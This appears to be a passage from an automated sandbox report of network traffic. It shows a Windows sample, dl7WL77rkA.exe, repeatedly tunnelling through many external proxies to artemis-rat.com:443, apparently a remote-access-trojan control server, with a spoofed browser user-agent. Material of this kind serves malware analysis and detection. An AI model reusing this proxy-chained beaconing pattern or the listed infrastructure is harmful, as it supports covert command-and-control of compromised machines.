                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            92192.168.2.550048185.219.133.10631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.942972898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.290262938 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            93192.168.2.550173172.67.181.85803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.971839905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.126097918 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            94192.168.2.55007062.112.11.204264313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.971918106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.270011902 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            95192.168.2.55010218.134.236.23131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972024918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.266376972 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            96192.168.2.550206172.67.182.38803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972099066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.126737118 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            97192.168.2.550139184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972194910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            98192.168.2.550211104.18.143.26803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972210884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.126688957 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            99192.168.2.550179104.20.233.70803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972764969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.127104044 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            100192.168.2.5500928.211.4.215803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972887039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.278597116 CET503INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 324
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            101192.168.2.550178104.18.44.93803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.973248959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.127522945 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            102192.168.2.550171104.21.124.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.973455906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.128079891 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            103192.168.2.55006165.109.163.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.973485947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.356525898 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            104192.168.2.5500663.122.84.9931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.973651886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.278562069 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            105192.168.2.550129184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.975692987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.576721907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            106192.168.2.55015768.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.983932972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            107192.168.2.55010837.187.77.58134123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.989428043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            108192.168.2.55021747.88.3.1980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.991018057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.162166119 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.23.4
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            109192.168.2.549995110.93.227.2831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.995230913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
